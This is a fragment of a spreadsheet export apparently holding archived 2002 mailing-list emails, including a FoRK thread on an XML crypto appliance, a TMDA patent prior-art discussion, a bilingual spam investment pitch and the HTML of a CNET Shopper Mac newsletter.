 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Now, to do this, we all know they have to be cracking the strong crypto used
 &gt; on all transaction in order to process them... So this has some preaty heavy
 &gt; implications, unless it's just BS.
 Anybody buying a box like this is undoubtledly going to integrate it into their
 crypto infrastructure.  What's the point of putting in a box like this if it's
 not an active participant in your security framework?
 &gt; Or.... you could just not bloat it 20x to begin with. Nah! (that was the
 &gt; whole point of XML afterall, to sell more CPUs - much like Oracle's use of
 &gt; Java allows them to sell 3x more CPU licenses due to the performance hit)
 Blah, blah, blah.  The marketing FUD gets compounded by the Beberg FUD, talk
 about 20x bloat.
 &gt; Again, see above... they _are_ claiming to decode the crypto...
 What gives you the impression that's what they're doing?  That's not what the
 text says.  It's largely fluff anyway.
 &gt; &gt; "Our XG3 execution core converts XML to machine code," said Kelly,
 &gt; Mmmmmmmmmmm, machine code, never a good idea ;)
 Uhhh, fundamentally it's all machine code.  Kelly's comment seems more like
 drivel from a clueless marketroid than anything of technical concern.
 Having what appears to be a silicon XML router would be a cool thing.  Having
 one integrated with your crypto environment would kick ass.  Let it
 deserialize/decrypt/repackage the XML before handing it off to the app servers.
 The question, of course, is does it work with actual applications in the field
 without tremendously reworking them.  Somehow I doubt it...
 -Bill Kearney
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 The Financial News, May 2002
 Production Mini-plants in mobile containers. Co-investment Program
 =22...Science Network will supply to countries and developing regions the technology and the necessary support for the production in series of Mini-plants in mobile=20containers (40-foot). The Mini-plant system is designed in such a way that all the production machinery is fixed on the platform of the container, with all wiring,=20piping, and installation parts; that is to say, they are fully equipped... and the mini-plant is ready for production.=22
 More than 700 portable production systems: Bakeries, Steel Nails, Welding Electrodes, Tire Retreading, Reinforcement Bar Bending for Construction Framework,=20Sheeting for Roofing, Ceilings and Fa=E7ades, Plated Drums, Aluminum Buckets, Injected Polypropylene Housewares, Pressed Melamine Items (Glasses, Cups,=20Plates, Mugs, etc.), Mufflers, Construction Electrically Welded Mesh, Plastic Bags and Packaging, Mobile units of medical assistance, Sanitary Material,=20Hypodermic Syringes, Hemostatic Clamps, etc.=20
 Science Network has started a process of Co-investment for the installation of small Assembly plants to manufacture in series the Mini-plants of portable=20production on the site, region or country where they may be required. One of the most relevant features is the fact that these plants will be connected to the World=20Trade System (WTS) with access to more than 50 million raw materials, products and services and automatic transactions for world trade.
 Because of financial reasons, involving cost and social impact, the right thing to do is to set up assembly plants in the same countries and regions, using local=20resources (labor, some equipment, etc.)
 For more information: &lt;A HREF=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plants in mobile containers&lt;/A&gt;
 By Steven P. Leibacher, The Financial News, Editor
 Mini-plantas de produccion en contenedores moviles. Programa de Co-inversion
 =22...Science Network suministrara a paises y regiones en vias de desarrollo la tecnologia y el apoyo necesario para la fabricacion en serie de Mini-plantas de=20produccion en contenedores moviles (40-foot). El sistema de mini-plantas esta dise=F1ado de forma que todas las maquinas de produccion van instaladas fijas=20sobre la propia plataforma del contenedor, con el cableado, tuberias e instalaciones; es decir, completamente equipadas... y a partir de ese momento est=E1n listas=20para producir.=22=20
 Mas de 700 sistemas de produccion portatil: Panaderias, Producci=F3n de clavos de acero, Electrodos para soldadura, Recauchutado de neumaticos, Curvado de=20hierro para armaduras de construccion, Lamina perfilada para cubiertas, techos y cerramientos de fachada, Bidones de chapa, Cubos de aluminio, Menaje de=20polipropileno inyectado, Piezas de melamina prensada (vasos, platos, tazas, cafeteras, etc.) Silenciadores para vehiculos, Malla electrosoldada para la=20construccion, Bolsas y envases de plastico, Unidades moviles de asistencia medica, Material sanitario (jeringas hipodermicas, Pinzas hemostaticas, etc.)
 Science Network ha puesto en marcha un proceso de Co-inversion para la instalacion de peque=F1as Plantas ensambladoras para fabricar en serie las Mini-plantas=20de produccion portatil, en el lugar, region o pais que lo necesite. Una de las caracter=EDsticas relevantes es el hecho de que dichas plantas quedaran conectadas al=20Sistema del Comercio Mundial (WTS) con acceso a mas de 50 millones de mercancias, materia primas, productos, servicios y las operaciones automaticas de=20comercio internacional.=20
 Resulta obvio que por razones economicas, de costes y de impacto social, lo apropiado es instalar plantas ensambladoras en los mismos paises y regiones asi=20como utilizar los recursos locales (mano de obra, ciertos equipamientos, etc.)
 Para recibir mas infromacion: &lt;A HREF=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plantas de produccion en contenedores moviles&lt;/A&gt;
 Steven P. Leibacher, The Financial News, Editor
 -------------------------------------------------------------------------
 If you received this in error or would like to be removed from our list, please return us indicating: remove or un-subscribe in 'subject' field, Thanks. &lt;A=20HREF=3D=22mailto:newsletters=40the-financial-news.com=22&gt; Editor&lt;/A&gt;
 =A9 2002 The Financial News. All rights reserved.
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;meta http-equiv=3D=22content-type=22 content=3D=22text/html;CHARSET=3Diso8859-1=22&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D=22=23FFFFFF=22&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;The Financial News, May 2002&lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;Production Mini-plants in mobile containers. Co-investment Program&lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;BR&gt;
 =22...Science Network will supply to countries and developing regions the technology and the necessary support for the production in series of Mini-plants in mobile containers (40-foot). The Mini-plant system is designed in such a way that all the production machinery is fixed on the platform of the container, with all wiring, piping, and installation parts; that is to say, they are fully equipped... and the mini-plant is ready for production.=22&lt;BR&gt;
 &lt;BR&gt;
 More than 700 portable production systems: Bakeries, Steel Nails, Welding Electrodes, Tire Retreading, Reinforcement Bar Bending for Construction Framework, Sheeting for Roofing, Ceilings and Fa&amp;ccedil;ades, Plated Drums, Aluminum Buckets, Injected Polypropylene Housewares, Pressed Melamine Items (Glasses, Cups, Plates, Mugs, etc.), Mufflers, Construction Electrically Welded Mesh, Plastic Bags and Packaging, Mobile units of medical assistance, Sanitary Material, Hypodermic Syringes, Hemostatic Clamps, etc. &lt;BR&gt;
 &lt;BR&gt;
 Science Network has started a process of Co-investment for the installation of small Assembly plants to manufacture in series the Mini-plants of portable production on the site, region or country where they may be required. One of the most relevant features is the fact that these plants will be connected to the World Trade System (WTS) with access to more than 50 million raw materials, products and services and automatic transactions for world trade.&lt;BR&gt;
 &lt;BR&gt;
 Because of financial reasons, involving cost and social impact, the right thing to do is to set up assembly plants in the same countries and regions, using local resources (labor, some equipment, etc.)&lt;BR&gt;
 &lt;BR&gt;
 For more information: &lt;a href=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plants in mobile containers&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 By Steven P. Leibacher, The Financial News, Editor&lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;&lt;BR&gt;
 Mini-plantas de produccion en contenedores moviles. Programa de Co-inversion&lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;=22...Science Network s&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;uministrara a paises y regiones en vias de desarrollo la tecnologia y el apoyo necesario para la fabricacion en serie de Mini-plantas de produccion en contenedores moviles (40-foot)&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;. El sistema de mini-plantas esta dise&amp;ntilde;ado de forma que todas las maquinas de produccion van instaladas fijas sobre la propia plataforma del contenedor, con el cableado, tuberias e instalaciones; es decir, completamente equipadas... y a partir de ese momento est&amp;aacute;n listas para producir.=22 &lt;BR&gt;
 &lt;BR&gt;
 Mas de 700 sistemas de produccion portatil: Panaderias, Producci&amp;oacute;n de clavos de acero, Electrodos para soldadura, Recauchutado de neumaticos, Curvado de hierro para armaduras de construccion, Lamina perfilada para cubiertas, techos y cerramientos de fachada, Bidones de chapa, Cubos de aluminio, Menaje de polipropileno inyectado, Piezas de melamina prensada (vasos, platos, tazas, cafeteras, etc.) Silenciadores para vehiculos, Malla electrosoldada para la construccion, Bolsas y envases de plastico, Unidades moviles de asistencia medica, Material sanitario (jeringas hipodermicas, Pinzas hemostaticas, etc.)&lt;BR&gt;
 &lt;BR&gt;
 Science Network ha puesto en marcha un proceso de Co-inversion para la instalacion de peque&amp;ntilde;as Plantas ensambladoras para fabricar en serie las Mini-plantas de produccion portatil, en el lugar, region o pais que lo necesite. Una de las caracter&amp;iacute;sticas relevantes es el hecho de que dichas plantas quedaran conectadas al Sistema del Comercio Mundial (WTS) con acceso a mas de 50 millones de mercancias, materia primas, productos, servicios y las operaciones automaticas de comercio internacional. &lt;BR&gt;
 &lt;BR&gt;
 Resulta obvio que por razones economicas, de costes y de impacto social, lo apropiado es instalar plantas ensambladoras en los mismos paises y regiones asi como utilizar los recursos locales (mano de obra, ciertos equipamientos, etc.)&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;Para recibir mas infromacion: &lt;a href=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plantas de produccion en contenedores moviles&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 Steven P. Leibacher, The Financial News, Editor&lt;BR&gt;
 &lt;BR&gt;
 -------------------------------------------------------------------------&lt;BR&gt;
 If you received this in error or would like to be removed from our list, please return us indicating: remove or un-subscribe in 'subject' field, Thanks. &lt;a href=3D=22mailto:newsletters=40the-financial-news.com=22&gt; Editor&lt;/a&gt;&lt;BR&gt;
 &amp;copy; 2002 The Financial News. All rights reserved.&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;&lt;BR&gt;
 &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lt;/FONT&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --=_NextPart_2rfkindysadvnqw3nerasdf--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: W3C approves HTML 4 'emotitags' [...]
</t>
  </si>
  <si>
    <t xml:space="preserve">Damien Morton quoted:
 &gt;W3C approves HTML 4 'emotitags' - Now you'll be able to say it with feeling
 &gt;&gt;From The Rockall Times (http://www.therockalltimes.co.uk/), definitely
 the source of much funniness.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From tmda.net/history.html:
 The first release of TMDA in April 2001 was essentially a rewrite of TMS in
 Python, &lt;snip&gt;
 April 2001 is earlier than July 26, 2001... prior art..
 from http://tmda.net/releases/old/
  Parent Directory        19-Aug-2002 16:14      -
  README.MD5SUM           19-Aug-2002 16:14     4k
  tmda-0.01.tgz           22-Apr-2001 15:59    11k
  tmda-0.02.tgz           26-Apr-2001 12:06    12k
  tmda-0.02.txt           26-Apr-2001 12:50     1k
  tmda-0.10.tgz           27-Apr-2001 21:14    39k
  tmda-0.10.txt           30-Apr-2001 11:36     3k
  tmda-0.11.tgz           02-May-2001 17:17    38k
  tmda-0.11.txt           02-May-2001 17:06     3k
  tmda-0.12.tgz           10-May-2001 19:50    39k
  tmda-0.12.txt           10-May-2001 19:48     1k
  tmda-0.13.tgz           17-May-2001 15:53    39k
  tmda-0.13.txt           17-May-2001 15:57     2k
  tmda-0.14.tgz           24-May-2001 16:43    46k
  tmda-0.14.txt           24-May-2001 16:40     4k
  tmda-0.15.tgz           28-May-2001 15:20    47k
  tmda-0.15.txt           28-May-2001 15:20     1k
  tmda-0.20.tgz           06-Jun-2001 17:52    49k
  tmda-0.20.txt           06-Jun-2001 18:46     6k
  tmda-0.21.tgz           18-Jun-2001 18:32    51k
  tmda-0.21.txt           18-Jun-2001 18:31     2k
 TMDA was already at 0.21 8 days before filing for a patent..
 ----- Original Message -----
 From: "Jason R. Mastaler" &lt;jason-exp-1031164464.7f11b3@mastaler.com&gt;
 To: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;
 Cc: &lt;spamassassin-talk@example.sourceforge.net&gt;; &lt;tmda-users@tmda.net&gt;
 Sent: Tuesday, August 27, 2002 11:34 AM
 Subject: [SAtalk] Re: patent on TMDA-like system
 jm@jmason.org (Justin Mason) writes:
 &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
 &gt; granted May 16, 2002.
 &gt;
 &gt; TMDAers, have you seen this before?
 No, but thanks for pointing it out.
 &gt; I'd presume TMDA is prior art, but still, it could be troublesome...
 Yup.  TMDA's core functionality was fully established before even the
 filing date.
 Anyone with experience in this area have a recommendation on whether
 this should be pursued or not?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</si>
  <si>
    <t xml:space="preserve">Subject: =?iso-8859-1?Q?Re:_RE:_=5Bzzzzteana=5D_Sitting_Bull_=FCber_alles_=5BLong=5D?=
</t>
  </si>
  <si>
    <t xml:space="preserve">Just to put the germano-Indian fascination in context, one should note that
 there is a sizable group of German Klingons as well. Well, _I_ see a
 connection, anyway.
 Bill
 William Jacobs
 Sporadically Underemployed Person
 I wish to God these calculations had been executed by steam! - Charles
 Babbage
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Our new Memory Configurator makes RAM shopping easy! (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: MAC Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_mac.gif" width="442" height="60" border="0" alt="CNET Shopper Mac Edition"&gt;&lt;br&gt;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&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKOQURC20Xvsg9tyQFWvZR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6paohCvOP2463LvvI2rgYdR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BadhxhBx7h8FdMkmoOwzcR" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxwjkBDJn3ufz1Jey2fPRR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVkrp7FY12-JM2mPpt29eFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXJh47F_DpiaRL6DCwol9R" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CK73CEhNv0T0QkY6b7uR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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href="http://clickthru.online.com/Click?q=23-sFcGINM80CPFn50iAv2Y9ZZvQKFR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2LJ0rXSXnhJiSUxuD-D9R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDQ-sXKXQdaB0S22bbKAeR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgZqHIaydG9TmIKJ15BRyR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsqtJcfz0x31g9NPmdZPPR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/macproducts_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;B&gt;Dear Reader,&lt;/B&gt;&lt;p&gt;
 											Is your Mac acting a bit sluggish? Does is sometimes choke
 on large graphics files or spend more time than ever
 spinning its hard drive?
 &lt;P&gt;
 Adding more RAM to your Mac is an easy way to get the most 
 out of your favorite game and graphics applications. But
 unfortunately, figuring out what type to buy is often both 
 difficult and frustrating. 
 &lt;P&gt;
 CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHtf_9SNVFm8il40AWNdR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding the perfect 
 memory easy! Whether you're searching for iBook, iMac, 
 or PowerBook memory, your just a few clicks away from the 
 upgrade you'll need to get your system living up to its
 full potential.
 &lt;P&gt;
 Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKMEbzdZeGkeHaXeD3gBcR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 										&lt;/TD&gt;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2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyp1s_8Z5T_PUCch20LgRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8400555_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcgm3nIGyXYHRf_uaHkFR" &gt;&lt;B&gt;Apple iMac&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; PowerPC G4, 800MHz&lt;BR&gt;
 								&amp;#149; DVD-CDRW&lt;BR&gt;
 								&amp;#149; 256MB RAM, 60GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,805&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=e1-6RvNQxk2WvkOwxlPhsYK3Awi9qcR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6602925_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrDgCrPxfYYRGOT9_JmpRR" &gt;&lt;B&gt;Apple Power Mac G4  &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; PowerPC G4 867MHz&lt;BR&gt;
 								&amp;#149; 128MB SDRAM&lt;BR&gt;
 								&amp;#149; 60GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,775&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=0b-0NI-INQ4dZcAD6TGftmZCtvxYhFR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8749847_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzW49GiyKtR-pp7us2Qf9R" &gt;&lt;B&gt;Formac Gallery 1740 (DVI)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 17.4-inch TFT active matrix&lt;BR&gt;
 								&amp;#149; ADC-to-DVI/USB/Power converter box&lt;BR&gt;
 								&amp;#149; 1,280x1,024 resolution&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$949 &lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4EelvpKNXLTSyPWc3uR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/2544673_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXKPcorsxoLkkTKhn-yR" &gt;&lt;B&gt;Harman Kardon SoundSticks&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Superior sound quality&lt;BR&gt;
 								&amp;#149; 65 total watts maximum&lt;BR&gt;
 								&amp;#149; 6-inch woofer, USB&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$157&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 							&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2c7-Ra96fez6pa6cIJPR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8928341_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAIuAv8oO_rjups7LLZ5eR" &gt;&lt;B&gt;Palm m515&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; MultiMediaCard slot&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$312&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;			&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndaN32JjIO3Nt-tKChBwsR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/6886275_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdL3s486IYlcGhVIlcU_ZR" &gt;&lt;B&gt;Canon PowerShot G2&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.0-megapixel&lt;BR&gt;
 								&amp;#149; 3x optical/3.6x digital zoom&lt;BR&gt;
 								&amp;#149; 32MB CompactFlash card &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$649&lt;/font&gt;&lt;/B&gt;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&lt;p&gt;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 enables you to streamline 
 your sales process by building quotes and orders online? 
 &lt;P&gt;
 Simply select a customer you've previously entered into 
 ChannelOnline's database and their company information, 
 and a customized price profile is automatically applied 
 to their quote. You can add products as you search the 
 product database and work on multiple quotes at once as 
 you respond to different customer requests throughout 
 the day. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xDckfxgqJzDxDXozLCdR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to streamline your entire buying and selling 
 chain. 
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkUNzf4fgjg0SxiPZvH6cR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=de-7tpkQMWaOAfjtEttTbDS-BJjhoRR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwjRNeMSJCs3CyJqsjeoFR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUrP9KmEg3F-erCpGY99R" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF77NmjKKRl28NRQSnqQuR" &gt;Shopping&lt;/a&gt;
